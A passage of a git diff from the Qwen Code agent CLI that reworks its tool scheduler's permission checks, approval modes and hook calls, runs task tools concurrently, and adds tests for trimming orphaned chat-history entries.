vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), + } as unknown as Config; + + return new CoreToolScheduler({ + config: mockConfig, + onAllToolCallsComplete, + onToolCallsUpdate, + getPreferredEditor: () => 'vscode', + onEditorClose: vi.fn(), + }); + } + + it('should execute multiple task tools concurrently', async () => { + const executionLog: string[] = []; + + const taskTool = new MockTool({ + name: 'task', + execute: async (params) => { + const id = (params as { id: string }).id; + executionLog.push(`start:${id}`); + // Simulate async work — concurrent tasks will interleave here + await new Promise((r) => setTimeout(r, 50)); + executionLog.push(`end:${id}`); + return { + llmContent: `Task ${id} done`, + returnDisplay: `Task ${id} done`, + }; + }, + }); + + const tools = new Map([['task', taskTool]]); + const onAllToolCallsComplete = vi.fn(); + const onToolCallsUpdate = vi.fn(); + const scheduler = createScheduler( + tools, + onAllToolCallsComplete, + onToolCallsUpdate, + ); + + const abortController = new AbortController(); + const requests = [ + { + callId: '1', + name: 'task', + args: { id: 'A' }, + isClientInitiated: false, + prompt_id: 'p1', + }, + { + callId: '2', + name: 'task', + args: { id: 'B' }, + isClientInitiated: false, + prompt_id: 'p1', + }, + { + callId: '3', + name: 'task', + args: { id: 'C' }, + isClientInitiated: false, + prompt_id: 'p1', + }, + ]; + + await scheduler.schedule(requests, abortController.signal); + + // All tasks should have completed + expect(onAllToolCallsComplete).toHaveBeenCalled(); + const completedCalls = onAllToolCallsComplete.mock + .calls[0][0] as ToolCall[]; + expect(completedCalls).toHaveLength(3); + expect(completedCalls.every((c) => c.status === 'success')).toBe(true); + + // Verify concurrency: all tasks should start before any finishes + // With sequential execution, the log would be [start:A, end:A, start:B, end:B, ...] + // With concurrent execution, all starts happen before any end + const startIndices = executionLog + .filter((e) => e.startsWith('start:')) + .map((e) => executionLog.indexOf(e)); + const firstEnd = executionLog.findIndex((e) => e.startsWith('end:')); + expect(startIndices.every((i) => i < firstEnd)).toBe(true); + }); + + it('should run task tools concurrently while other tools run sequentially', async () => { + const executionLog: string[] = []; + + const taskTool = new MockTool({ + name: 'task', + execute: async (params) => { + const id = (params as { id: string }).id; + executionLog.push(`task:start:${id}`); + await new Promise((r) => setTimeout(r, 50)); + executionLog.push(`task:end:${id}`); + return { + llmContent: `Task ${id} done`, + returnDisplay: `Task ${id} done`, + }; + }, + }); + + const readTool = new MockTool({ + name: 'read_file', + execute: async (params) => { + const id = (params as { id: string }).id; + executionLog.push(`read:start:${id}`); + await new Promise((r) => setTimeout(r, 20)); + executionLog.push(`read:end:${id}`); + return { + llmContent: `Read ${id} done`, + returnDisplay: `Read ${id} done`, + }; + }, + }); + + const tools = new Map([ + ['task', taskTool], + ['read_file', readTool], + ]); + const onAllToolCallsComplete = vi.fn(); + const onToolCallsUpdate = vi.fn(); + const scheduler = createScheduler( + tools, + onAllToolCallsComplete, + onToolCallsUpdate, + ); + + const abortController = new AbortController(); + const requests = [ + { + callId: '1', + name: 'read_file', + args: { id: '1' }, + isClientInitiated: false, + prompt_id: 'p1', + }, + { + callId: '2', + name: 'task', + args: { id: 'A' }, + isClientInitiated: false, + prompt_id: 'p1', + }, + { + callId: '3', + name: 'read_file', + args: { id: '2' }, + isClientInitiated: false, + prompt_id: 'p1', + }, + { + callId: '4', + name: 'task', + args: { id: 'B' }, + isClientInitiated: false, + prompt_id: 'p1', + }, + ]; + + await scheduler.schedule(requests, abortController.signal); + + expect(onAllToolCallsComplete).toHaveBeenCalled(); + const completedCalls = onAllToolCallsComplete.mock + .calls[0][0] as ToolCall[]; + expect(completedCalls).toHaveLength(4); + expect(completedCalls.every((c) => c.status === 'success')).toBe(true); + + // Non-task tools should execute sequentially: read:1 finishes before read:2 starts + const read1End = executionLog.indexOf('read:end:1'); + const read2Start = executionLog.indexOf('read:start:2'); + expect(read1End).toBeLessThan(read2Start); + + // Task tools should execute concurrently: both start before either ends + const taskAStart = executionLog.indexOf('task:start:A'); + const taskBStart = executionLog.indexOf('task:start:B'); + const firstTaskEnd = Math.min( + executionLog.indexOf('task:end:A'), + executionLog.indexOf('task:end:B'), + ); + expect(taskAStart).toBeLessThan(firstTaskEnd); + expect(taskBStart).toBeLessThan(firstTaskEnd); + }); + }); +}); diff --git a/packages/core/src/core/coreToolScheduler.ts b/packages/core/src/core/coreToolScheduler.ts index a4f50066e..7cc5c9099 100644 --- a/packages/core/src/core/coreToolScheduler.ts +++ b/packages/core/src/core/coreToolScheduler.ts @@ -19,18 +19,25 @@ import type { ChatRecordingService, } from '../index.js'; import { createDebugLogger } from '../utils/debugLogger.js'; +import { + generateToolUseId, + firePreToolUseHook, + firePostToolUseHook, + firePostToolUseFailureHook, + fireNotificationHook, + firePermissionRequestHook, + appendAdditionalContext, +} from './toolHookTriggers.js'; +import { NotificationType } from '../hooks/types.js'; +import type { MessageBus } from '../confirmation-bus/message-bus.js'; const debugLogger = createDebugLogger('TOOL_SCHEDULER'); import { ToolConfirmationOutcome, ApprovalMode, logToolCall, - ReadFileTool, ToolErrorType, ToolCallEvent, - ShellTool, - logToolOutputTruncated, - ToolOutputTruncatedEvent, InputFormat, Kind, SkillTool, @@ -42,6 +49,7 @@ import type { PartListUnion, } from '@google/genai'; import { ToolNames } from '../tools/tool-names.js'; +import { buildPermissionRules } from '../permissions/rule-parser.js'; import { getResponseTextFromParts } from '../utils/generateContentResponseUtilities.js'; import type { ModifyContext } from '../tools/modifiable-tool.js'; import { @@ -49,9 +57,7 @@ import { modifyWithEditor, } from '../tools/modifiable-tool.js'; import * as Diff from 'diff'; -import * as fs from 'node:fs/promises'; import * as path from 'node:path'; -import { doesToolInvocationMatch } from '../utils/tool-utils.js'; import levenshtein from 'fast-levenshtein'; import { getPlanModeSystemReminder } from './prompts.js'; import { ShellToolInvocation } from '../tools/shell.js'; @@ -306,67 +312,6 @@ const createErrorResponse = ( contentLength: error.message.length, }); -export async function truncateAndSaveToFile( - content: string, - callId: string, - projectTempDir: string, - threshold: number, - truncateLines: number, -): Promise<{ content: string; outputFile?: string }> { - if (content.length <= threshold) { - return { content }; - } - - let lines = content.split('\n'); - let fileContent = content; - - // If the content is long but has few lines, wrap it to enable line-based truncation. - if (lines.length <= truncateLines) { - const wrapWidth = 120; // A reasonable width for wrapping. - const wrappedLines: string[] = []; - for (const line of lines) { - if (line.length > wrapWidth) { - for (let i = 0; i < line.length; i += wrapWidth) { - wrappedLines.push(line.substring(i, i + wrapWidth)); - } - } else { - wrappedLines.push(line); - } - } - lines = wrappedLines; - fileContent = lines.join('\n'); - } - - const head = Math.floor(truncateLines / 5); - const beginning = lines.slice(0, head); - const end = lines.slice(-(truncateLines - head)); - const truncatedContent = - beginning.join('\n') + '\n... [CONTENT TRUNCATED] ...\n' + end.join('\n'); - - // Sanitize callId to prevent path traversal. - const safeFileName = `${path.basename(callId)}.output`; - const outputFile = path.join(projectTempDir, safeFileName); - try { - await fs.writeFile(outputFile, fileContent); - - return { - content: `Tool output was too large and has been truncated. -The full output has been saved to: ${outputFile} -To read the complete output, use the ${ReadFileTool.Name} tool with the absolute file path above. -The truncated output below shows the beginning and end of the content. The marker '... [CONTENT TRUNCATED] ...' indicates where content was removed. -This allows you to efficiently examine different parts of the output without loading the entire file. -Truncated part of the output: -${truncatedContent}`, - outputFile, - }; - } catch (_error) { - return { - content: - truncatedContent + `\n[Note: Could not save full output to file]`, - }; - } -} - interface CoreToolSchedulerOptions { config: Config; outputUpdateHandler?: OutputUpdateHandler; @@ -509,6 +454,7 @@ export class CoreToolScheduler { : undefined; // Preserve diff for cancelled edit operations + // Preserve plan content for cancelled plan operations let resultDisplay: ToolResultDisplay | undefined = undefined; if (currentCall.status === 'awaiting_approval') { const waitingCall = currentCall as WaitingToolCall; @@ -520,6 +466,13 @@ export class CoreToolScheduler { waitingCall.confirmationDetails.originalContent, newContent: waitingCall.confirmationDetails.newContent, }; + } else if (waitingCall.confirmationDetails.type === 'plan') { + resultDisplay = { + type: 'plan_summary', + message: 'Plan was rejected. Remaining in plan mode.', + plan: waitingCall.confirmationDetails.plan, + rejected: true, + }; } } else if (currentCall.status === 'executing') { // If the tool was streaming live output, preserve the latest @@ -746,27 +699,44 @@ export class CoreToolScheduler { (reqInfo): ToolCall => { // Check if the tool is excluded due to permissions/environment restrictions // This check should happen before registry lookup to provide a clear permission error - const excludeTools = this.config.getExcludeTools?.() ?? undefined; - if (excludeTools && excludeTools.length > 0) { - const normalizedToolName = reqInfo.name.toLowerCase().trim(); - const excludedMatch = excludeTools.find( - (excludedTool) => - excludedTool.toLowerCase().trim() === normalizedToolName, - ); + const pm = this.config.getPermissionManager?.(); + if (pm && !pm.isToolEnabled(reqInfo.name)) { + const permissionErrorMessage = `Qwen Code requires permission to use "${reqInfo.name}", but that permission was declined.`; + return { + status: 'error', + request: reqInfo, + response: createErrorResponse( + reqInfo, + new Error(permissionErrorMessage), + ToolErrorType.EXECUTION_DENIED, + ), + durationMs: 0, + }; + } - if (excludedMatch) { - // The tool exists but is excluded - return permission error directly - const permissionErrorMessage = `Qwen Code requires permission to use ${excludedMatch}, but that permission was declined.`; - return { - status: 'error', - request: reqInfo, - response: createErrorResponse( - reqInfo, - new Error(permissionErrorMessage), - ToolErrorType.EXECUTION_DENIED, - ), - durationMs: 0, - }; + // Legacy fallback: check getPermissionsDeny() when PM is not available + if (!pm) { + const excludeTools = + this.config.getPermissionsDeny?.() ?? undefined; + if (excludeTools && excludeTools.length > 0) { + const normalizedToolName = reqInfo.name.toLowerCase().trim(); + const excludedMatch = excludeTools.find( + (excludedTool) => + excludedTool.toLowerCase().trim() === normalizedToolName, + ); + if (excludedMatch) { + const permissionErrorMessage = `Qwen Code requires permission to use ${excludedMatch}, but that permission was declined.`; + return { + status: 'error', + request: reqInfo, + response: createErrorResponse( + reqInfo, + new Error(permissionErrorMessage), + ToolErrorType.EXECUTION_DENIED, + ), + durationMs: 0, + }; + } } } @@ -856,10 +826,86 @@ export class CoreToolScheduler { continue; } - const confirmationDetails = - await invocation.shouldConfirmExecute(signal); + // ================================================================= + // L3→L4→L5 Permission Flow + // ================================================================= - if (!confirmationDetails) { + // ---- L3: Tool's default permission ---- + const defaultPermission: string = + await invocation.getDefaultPermission(); + + // ---- L4: PermissionManager override (if relevant rules exist) ---- + const pm = this.config.getPermissionManager?.(); + let finalPermission = defaultPermission; + let pmForcedAsk = false; + + // Build invocation context from tool params. + // This is used both by the PM evaluation below and later by + // centralized permission-rule generation (Always Allow). + const toolParams = invocation.params as Record; + const shellCommand = + 'command' in toolParams ? String(toolParams['command']) : undefined; + // Extract file path — tools use 'absolute_path', 'file_path', + // or 'path' (LS / grep / glob). + let invocationFilePath = + typeof toolParams['absolute_path'] === 'string' + ? toolParams['absolute_path'] + : typeof toolParams['file_path'] === 'string' + ? toolParams['file_path'] + : undefined; + if ( + invocationFilePath === undefined && + typeof toolParams['path'] === 'string' + ) { + // LS uses absolute paths; grep/glob may be relative to targetDir. + invocationFilePath = path.isAbsolute(toolParams['path']) + ? toolParams['path'] + : path.resolve(this.config.getTargetDir(), toolParams['path']); + } + let invocationDomain: string | undefined; + if (typeof toolParams['url'] === 'string') { + try { + invocationDomain = new URL(toolParams['url']).hostname; + } catch { + // malformed URL — leave domain undefined + } + } + // Generic specifier for literal matching (Skill name, Task subagent type, etc.) + const literalSpecifier = + typeof toolParams['skill'] === 'string' + ? toolParams['skill'] + : typeof toolParams['subagent_type'] === 'string' + ? toolParams['subagent_type'] + : undefined; + const pmCtx = { + toolName: reqInfo.name, + command: shellCommand, + filePath: invocationFilePath, + domain: invocationDomain, + specifier: literalSpecifier, + }; + + if (pm && defaultPermission !== 'deny') { + if (pm.hasRelevantRules(pmCtx)) { + const pmDecision = pm.evaluate(pmCtx); + if (pmDecision !== 'default') { + finalPermission = pmDecision; + // If PM explicitly forces 'ask', adding allow rules won't help + // because ask has higher priority. Hide "Always allow" options. + if (pmDecision === 'ask') { + pmForcedAsk = true; + } + } + } + } + + // ---- L5: Final decision based on permission + ApprovalMode ---- + const approvalMode = this.config.getApprovalMode(); + const isPlanMode = approvalMode === ApprovalMode.PLAN; + const isExitPlanModeTool = reqInfo.name === 'exit_plan_mode'; + + if (finalPermission === 'allow') { + // Auto-approve: tool is inherently safe (read-only) or PM allows this.setToolCallOutcome( reqInfo.callId, ToolConfirmationOutcome.ProceedAlways, @@ -868,54 +914,89 @@ export class CoreToolScheduler { continue; } - const allowedTools = this.config.getAllowedTools() || []; - const isPlanMode = - this.config.getApprovalMode() === ApprovalMode.PLAN; - const isExitPlanModeTool = reqInfo.name === 'exit_plan_mode'; + if (finalPermission === 'deny') { + // Hard deny: security violation or PM explicit deny + const denyMessage = + defaultPermission === 'deny' + ? `Tool "${reqInfo.name}" is denied: command substitution is not allowed for security reasons.` + : `Tool "${reqInfo.name}" is denied by permission rules.`; + this.setStatusInternal( + reqInfo.callId, + 'error', + createErrorResponse( + reqInfo, + new Error(denyMessage), + ToolErrorType.EXECUTION_DENIED, + ), + ); + continue; + } - // ask_user_question needs the confirmation flow even in plan mode - // so the user can actually answer the questions + // finalPermission === 'ask' (or 'default' from PM → treat as ask) + // apply ApprovalMode overrides. + // ask_user_question always needs confirmation so the user can answer; + // it must bypass both YOLO auto-approve and plan-mode blocking. const isAskUserQuestionTool = - confirmationDetails && - confirmationDetails.type === 'ask_user_question'; + reqInfo.name === ToolNames.ASK_USER_QUESTION; - if (isPlanMode && !isExitPlanModeTool && !isAskUserQuestionTool) { - if (confirmationDetails) { - this.setStatusInternal(reqInfo.callId, 'error', { - callId: reqInfo.callId, - responseParts: convertToFunctionResponse( - reqInfo.name, - reqInfo.callId, - getPlanModeSystemReminder(), - ), - resultDisplay: 'Plan mode blocked a non-read-only tool call.', - error: undefined, - errorType: undefined, - }); - } else { - this.setStatusInternal(reqInfo.callId, 'scheduled'); - } - } else if ( - (this.config.getApprovalMode() === ApprovalMode.YOLO || - doesToolInvocationMatch( - toolCall.tool, - invocation, - allowedTools, - )) && - // Even in YOLO mode, ask_user_question tool requires user confirmation to ensure the user always has a chance to respond to questions - confirmationDetails.type !== 'ask_user_question' - ) { + if (approvalMode === ApprovalMode.YOLO && !isAskUserQuestionTool) { this.setToolCallOutcome( reqInfo.callId, ToolConfirmationOutcome.ProceedAlways, ); this.setStatusInternal(reqInfo.callId, 'scheduled'); + } else if ( + isPlanMode && + !isExitPlanModeTool && + !isAskUserQuestionTool + ) { + this.setStatusInternal(reqInfo.callId, 'error', { + callId: reqInfo.callId, + responseParts: convertToFunctionResponse( + reqInfo.name, + reqInfo.callId, + getPlanModeSystemReminder(), + ), + resultDisplay: 'Plan mode blocked a non-read-only tool call.', + error: undefined, + errorType: undefined, + }); } else { + // Get confirmation details from the tool + const confirmationDetails = + await invocation.getConfirmationDetails(signal); + + // ── Centralised rule injection ────────────────────────────────── + // If the tool did not provide its own permissionRules (e.g. Shell + // and WebFetch already do), generate minimum-scope rules from + // the invocation context so that "Always Allow" persists a + // properly scoped rule rather than nothing. + // Only exec/mcp/info types support the permissionRules field. + if ( + (confirmationDetails.type === 'exec' || + confirmationDetails.type === 'mcp' || + confirmationDetails.type === 'info') && + !confirmationDetails.permissionRules + ) { + confirmationDetails.permissionRules = buildPermissionRules(pmCtx); + } + + // AUTO_EDIT mode: auto-approve edit-like and info tools + if ( + approvalMode === ApprovalMode.AUTO_EDIT && + (confirmationDetails.type === 'edit' || + confirmationDetails.type === 'info') + ) { + this.setToolCallOutcome( + reqInfo.callId, + ToolConfirmationOutcome.ProceedAlways, + ); + this.setStatusInternal(reqInfo.callId, 'scheduled'); + continue; + } + /** - * In non-interactive mode where no user will respond to approval prompts, - * and not running as IDE companion or Zed integration, automatically deny approval. - * This is intended to create an explicit denial of the tool call, - * rather than silently waiting for approval and hanging forever. + * In non-interactive mode, automatically deny. */ const shouldAutoDeny = !this.config.isInteractive() && @@ -960,9 +1041,78 @@ export class CoreToolScheduler { }); } + // Fire PermissionRequest hook before showing the permission dialog. + const messageBus = this.config.getMessageBus() as + | MessageBus + | undefined; + const hooksEnabled = this.config.getEnableHooks(); + + if (hooksEnabled && messageBus) { + const permissionMode = String(this.config.getApprovalMode()); + const hookResult = await firePermissionRequestHook( + messageBus, + reqInfo.name, + (reqInfo.args as Record) || {}, + permissionMode, + ); + + if (hookResult.hasDecision) { + if (hookResult.shouldAllow) { + // Hook granted permission - apply updated input if provided and proceed + if ( + hookResult.updatedInput && + typeof reqInfo.args === 'object' + ) { + this.setArgsInternal( + reqInfo.callId, + hookResult.updatedInput, + ); + } + await confirmationDetails.onConfirm( + ToolConfirmationOutcome.ProceedOnce, + ); + this.setToolCallOutcome( + reqInfo.callId, + ToolConfirmationOutcome.ProceedOnce, + ); + this.setStatusInternal(reqInfo.callId, 'scheduled'); + } else { + // Hook denied permission - cancel with optional message + const cancelPayload = hookResult.denyMessage + ? { cancelMessage: hookResult.denyMessage } + : undefined; + await confirmationDetails.onConfirm( + ToolConfirmationOutcome.Cancel, + cancelPayload, + ); + this.setToolCallOutcome( + reqInfo.callId, + ToolConfirmationOutcome.Cancel, + ); + this.setStatusInternal( + reqInfo.callId, + 'error', + createErrorResponse( + reqInfo, + new Error( + hookResult.denyMessage || + `Permission denied by hook for "${reqInfo.name}"`, + ), + ToolErrorType.EXECUTION_DENIED, + ), + ); + } + continue; + } + } + const originalOnConfirm = confirmationDetails.onConfirm; const wrappedConfirmationDetails: ToolCallConfirmationDetails = { ...confirmationDetails, + // When PM has an explicit 'ask' rule, 'always allow' would be + // ineffective because ask takes priority over allow. + // Hide the option so users aren't misled. + ...(pmForcedAsk ? { hideAlwaysAllow: true } : {}), onConfirm: ( outcome: ToolConfirmationOutcome, payload?: ToolConfirmationPayload, @@ -980,6 +1130,20 @@ export class CoreToolScheduler { 'awaiting_approval', wrappedConfirmationDetails, ); + + // Fire permission_prompt notification hook + if (hooksEnabled && messageBus) { + fireNotificationHook( + messageBus, + `Qwen Code needs your permission to use ${reqInfo.name}`, + NotificationType.PermissionPrompt, + 'Permission needed', + ).catch((error) => { + debugLogger.warn( + `Permission prompt notification hook failed: ${error instanceof Error ? error.message : String(error)}`, + ); + }); + } } } catch (error) { if (signal.aborted) { @@ -1025,7 +1189,43 @@ export class CoreToolScheduler { await originalOnConfirm(outcome, payload); - if (outcome === ToolConfirmationOutcome.ProceedAlways) { + if ( + outcome === ToolConfirmationOutcome.ProceedAlways || + outcome === ToolConfirmationOutcome.ProceedAlwaysProject || + outcome === ToolConfirmationOutcome.ProceedAlwaysUser + ) { + // Persist permission rules for Project/User scope outcomes + if ( + outcome === ToolConfirmationOutcome.ProceedAlwaysProject || + outcome === ToolConfirmationOutcome.ProceedAlwaysUser + ) { + const scope = + outcome === ToolConfirmationOutcome.ProceedAlwaysProject + ? 'project' + : 'user'; + // Read permissionRules from the stored confirmation details first, + // falling back to payload for backward compatibility. + const details = (toolCall as WaitingToolCall | undefined) + ?.confirmationDetails; + const detailsRules = (details as Record | undefined)?.[ + 'permissionRules' + ] as string[] | undefined; + const payloadRules = payload?.permissionRules; + const rules = payloadRules ?? detailsRules ?? []; + const persistFn = this.config.getOnPersistPermissionRule?.(); + const pm = this.config.getPermissionManager?.(); + if (rules.length > 0) { + for (const rule of rules) { + // 1. Persist to disk (settings.json) + if (persistFn) { + await persistFn(scope, 'allow', rule); + } + // 2. Immediately update in-memory PermissionManager so the + // new rule takes effect without restart. + pm?.addPersistentRule(rule, 'allow'); + } + } + } await this.autoApproveCompatiblePendingTools(signal, callId); } @@ -1140,9 +1340,28 @@ export class CoreToolScheduler { (call) => call.status === 'scheduled', ); - for (const toolCall of callsToExecute) { - await this.executeSingleToolCall(toolCall, signal); - } + // Task tools are safe to run concurrently — they spawn independent + // sub-agents with no shared mutable state. All other tools run + // sequentially in their original order to preserve any implicit + // ordering the model may rely on. + const taskCalls = callsToExecute.filter( + (call) => call.request.name === ToolNames.TASK, + ); + const otherCalls = callsToExecute.filter( + (call) => call.request.name !== ToolNames.TASK, + ); + + const taskPromise = Promise.all( + taskCalls.map((tc) => this.executeSingleToolCall(tc, signal)), + ); + + const othersPromise = (async () => { + for (const toolCall of otherCalls) { + await this.executeSingleToolCall(toolCall, signal); + } + })(); + + await Promise.all([taskPromise, othersPromise]); } } @@ -1155,6 +1374,41 @@ export class CoreToolScheduler { const scheduledCall = toolCall; const { callId, name: toolName } = scheduledCall.request; const invocation = scheduledCall.invocation; + const toolInput = scheduledCall.request.args as Record; + + // Generate unique tool_use_id for hook tracking + const toolUseId = generateToolUseId(); + + // Get MessageBus for hook execution + const messageBus = this.config.getMessageBus() as MessageBus | undefined; + const hooksEnabled = this.config.getEnableHooks(); + + // PreToolUse Hook + if (hooksEnabled && messageBus) { + // Convert ApprovalMode to permission_mode string for hooks + const permissionMode = this.config.getApprovalMode(); + const preHookResult = await firePreToolUseHook( + messageBus, + toolName, + toolInput, + toolUseId, + permissionMode, + ); + + if (!preHookResult.shouldProceed) { + // Hook blocked the execution + const blockMessage = + preHookResult.blockReason || 'Tool execution blocked by hook'; + const errorResponse = createErrorResponse( + scheduledCall.request, + new Error(blockMessage), + ToolErrorType.EXECUTION_DENIED, + ); + this.setStatusInternal(callId, 'error', errorResponse); + return; + } + } + this.setStatusInternal(callId, 'executing'); const liveOutputCallback = scheduledCall.tool.canUpdateOutput @@ -1204,51 +1458,75 @@ export class CoreToolScheduler { try { const toolResult: ToolResult = await promise; if (signal.aborted) { - this.setStatusInternal( - callId, - 'cancelled', - 'User cancelled tool execution.', - ); - return; + // PostToolUseFailure Hook + if (hooksEnabled && messageBus) { + const failureHookResult = await firePostToolUseFailureHook( + messageBus, + toolUseId, + toolName, + toolInput, + 'User cancelled tool execution.', + true, + this.config.getApprovalMode(), + ); + + // Append additional context from hook if provided + let cancelMessage = 'User cancelled tool execution.'; + if (failureHookResult.additionalContext) { + cancelMessage += `\n\n${failureHookResult.additionalContext}`; + } + this.setStatusInternal(callId, 'cancelled', cancelMessage); + } else { + this.setStatusInternal( + callId, + 'cancelled', + 'User cancelled tool execution.', + ); + } + return; // Both code paths should return here } if (toolResult.error === undefined) { let content = toolResult.llmContent; - let outputFile: string | undefined = undefined; const contentLength = typeof content === 'string' ? content.length : undefined; - if ( - typeof content === 'string' && - toolName === ShellTool.Name && - this.config.getEnableToolOutputTruncation() && - this.config.getTruncateToolOutputThreshold() > 0 && - this.config.getTruncateToolOutputLines() > 0 - ) { - const originalContentLength = content.length; - const threshold = this.config.getTruncateToolOutputThreshold(); - const lines = this.config.getTruncateToolOutputLines(); - const truncatedResult = await truncateAndSaveToFile( - content, - callId, - this.config.storage.getProjectTempDir(), - threshold, - lines, - ); - content = truncatedResult.content; - outputFile = truncatedResult.outputFile; - if (outputFile) { - logToolOutputTruncated( - this.config, - new ToolOutputTruncatedEvent(scheduledCall.request.prompt_id, { - toolName, - originalContentLength, - truncatedContentLength: content.length, - threshold, - lines, - }), + // PostToolUse Hook + if (hooksEnabled && messageBus) { + const toolResponse = { + llmContent: content, + returnDisplay: toolResult.returnDisplay, + }; + const permissionMode = this.config.getApprovalMode(); + const postHookResult = await firePostToolUseHook( + messageBus, + toolName, + toolInput, + toolResponse, + toolUseId, + permissionMode, + ); + + // Append additional context from hook if provided + if (postHookResult.additionalContext) { + content = appendAdditionalContext( + content, + postHookResult.additionalContext, ); } + + // Check if hook requested to stop execution + if (postHookResult.shouldStop) { + const stopMessage = + postHookResult.stopReason || 'Execution stopped by hook'; + const errorResponse = createErrorResponse( + scheduledCall.request, + new Error(stopMessage), + ToolErrorType.EXECUTION_DENIED, + ); + this.setStatusInternal(callId, 'error', errorResponse); + return; + } } const response = convertToFunctionResponse(toolName, callId, content); @@ -1258,13 +1536,31 @@ export class CoreToolScheduler { resultDisplay: toolResult.returnDisplay, error: undefined, errorType: undefined, - outputFile, contentLength, }; this.setStatusInternal(callId, 'success', successResponse); } else { // It is a failure - const error = new Error(toolResult.error.message); + // PostToolUseFailure Hook + let errorMessage = toolResult.error.message; + if (hooksEnabled && messageBus) { + const failureHookResult = await firePostToolUseFailureHook( + messageBus, + toolUseId, + toolName, + toolInput, + toolResult.error.message, + false, + this.config.getApprovalMode(), + ); + + // Append additional context from hook if provided + if (failureHookResult.additionalContext) { + errorMessage += `\n\n${failureHookResult.additionalContext}`; + } + } + + const error = new Error(errorMessage); const errorResponse = createErrorResponse( scheduledCall.request, error, @@ -1273,20 +1569,64 @@ export class CoreToolScheduler { this.setStatusInternal(callId, 'error', errorResponse); } } catch (executionError: unknown) { + const errorMessage = + executionError instanceof Error + ? executionError.message + : String(executionError); + if (signal.aborted) { - this.setStatusInternal( - callId, - 'cancelled', - 'User cancelled tool execution.', - ); + // PostToolUseFailure Hook (user interrupt) + if (hooksEnabled && messageBus) { + const failureHookResult = await firePostToolUseFailureHook( + messageBus, + toolUseId, + toolName, + toolInput, + 'User cancelled tool execution.', + true, + this.config.getApprovalMode(), + ); + + // Append additional context from hook if provided + let cancelMessage = 'User cancelled tool execution.'; + if (failureHookResult.additionalContext) { + cancelMessage += `\n\n${failureHookResult.additionalContext}`; + } + this.setStatusInternal(callId, 'cancelled', cancelMessage); + } else { + this.setStatusInternal( + callId, + 'cancelled', + 'User cancelled tool execution.', + ); + } + return; } else { + // PostToolUseFailure Hook + let exceptionErrorMessage = errorMessage; + if (hooksEnabled && messageBus) { + const failureHookResult = await firePostToolUseFailureHook( + messageBus, + toolUseId, + toolName, + toolInput, + errorMessage, + false, + this.config.getApprovalMode(), + ); + + // Append additional context from hook if provided + if (failureHookResult.additionalContext) { + exceptionErrorMessage += `\n\n${failureHookResult.additionalContext}`; + } + } this.setStatusInternal( callId, 'error', createErrorResponse( scheduledCall.request, executionError instanceof Error - ? executionError + ? new Error(exceptionErrorMessage) : new Error(String(executionError)), ToolErrorType.UNHANDLED_EXCEPTION, ), @@ -1385,10 +1725,57 @@ export class CoreToolScheduler { for (const pendingTool of pendingTools) { try { - const stillNeedsConfirmation = - await pendingTool.invocation.shouldConfirmExecute(signal); + // Re-run L3→L4 to see if the tool can now be auto-approved + const defaultPermission = + await pendingTool.invocation.getDefaultPermission(); + let finalPermission = defaultPermission; - if (!stillNeedsConfirmation) { + // L4: PM override + const pm = this.config.getPermissionManager?.(); + if (pm && defaultPermission !== 'deny') { + const params = pendingTool.invocation.params as Record< + string, + unknown + >; + const shellCommand = + 'command' in params ? String(params['command']) : undefined; + const filePath = + typeof params['absolute_path'] === 'string' + ? params['absolute_path'] + : typeof params['file_path'] === 'string' + ? params['file_path'] + : undefined; + let domain: string | undefined; + if (typeof params['url'] === 'string') { + try { + domain = new URL(params['url']).hostname; + } catch { + // malformed URL + } + } + // Generic specifier for literal matching (Skill name, Task subagent type, etc.) + const literalSpecifier = + typeof params['skill'] === 'string' + ? params['skill'] + : typeof params['subagent_type'] === 'string' + ? params['subagent_type'] + : undefined; + const pmCtx = { + toolName: pendingTool.request.name, + command: shellCommand, + filePath, + domain, + specifier: literalSpecifier, + }; + if (pm.hasRelevantRules(pmCtx)) { + const pmDecision = pm.evaluate(pmCtx); + if (pmDecision !== 'default') { + finalPermission = pmDecision; + } + } + } + + if (finalPermission === 'allow') { this.setToolCallOutcome( pendingTool.request.callId, ToolConfirmationOutcome.ProceedAlways, diff --git a/packages/core/src/core/geminiChat.test.ts b/packages/core/src/core/geminiChat.test.ts index 4f69b62eb..2f9e2d107 100644 --- a/packages/core/src/core/geminiChat.test.ts +++ b/packages/core/src/core/geminiChat.test.ts @@ -124,7 +124,13 @@ describe('GeminiChat', async () => { // Disable 429 simulation for tests setSimulate429(false); // Reset history for each test by creating a new instance - chat = new GeminiChat(mockConfig, config, []); + chat = new GeminiChat( + mockConfig, + config, + [], + undefined, + uiTelemetryService, + ); }); afterEach(() => { @@ -1718,4 +1724,73 @@ describe('GeminiChat', async () => { ]); }); }); + + describe('stripOrphanedUserEntriesFromHistory', () => { + it('should pop a single trailing user entry', () => { + chat.setHistory([ + { role: 'user', parts: [{ text: 'first message' }] }, + { role: 'model', parts: [{ text: 'first response' }] }, + { role: 'user', parts: [{ text: 'orphaned message' }] }, + ]); + + chat.stripOrphanedUserEntriesFromHistory(); + + expect(chat.getHistory()).toEqual([ + { role: 'user', parts: [{ text: 'first message' }] }, + { role: 'model', parts: [{ text: 'first response' }] }, + ]); + }); + + it('should pop multiple trailing user entries', () => { + chat.setHistory([ + { role: 'user', parts: [{ text: 'query' }] }, + { + role: 'model', + parts: [{ functionCall: { name: 'tool', args: {} } }], + }, + { role: 'user', parts: [{ text: 'IDE context' }] }, + { + role: 'user', + parts: [ + { + functionResponse: { + name: 'tool', + response: { result: 'ok' }, + }, + }, + ], + }, + ]); + + chat.stripOrphanedUserEntriesFromHistory(); + + expect(chat.getHistory()).toEqual([ + { role: 'user', parts: [{ text: 'query' }] }, + { + role: 'model', + parts: [{ functionCall: { name: 'tool', args: {} } }], + }, + ]); + }); + + it('should be a no-op when last entry is a model response', () => { + const history = [ + { role: 'user', parts: [{ text: 'hello' }] }, + { role: 'model', parts: [{ text: 'hi' }] }, + ]; + chat.setHistory([...history]); + + chat.stripOrphanedUserEntriesFromHistory(); + + expect(chat.getHistory()).toEqual(history); + }); + + it('should handle empty history', () => { + chat.setHistory([]); + + chat.stripOrphanedUserEntriesFromHistory(); + + expect(chat.getHistory()).toEqual([]); + }); + }); }); diff --git a/packages/core/src/core/geminiChat.ts b/packages/core/src/core/geminiChat.ts index f58bcdb61..db2d0b803 100644 --- a/packages/core/src/core/geminiChat.ts +++ b/packages/core/src/core/geminiChat.ts @@ -17,7 +17,8 @@ import type { GenerateContentResponseUsageMetadata, } from '@google/genai'; import { createUserContent } from '@google/genai'; -import { getErrorStatus, retryWithBackoff } from '../utils/retry.js'; +import { retryWithBackoff } from '../utils/retry.js'; 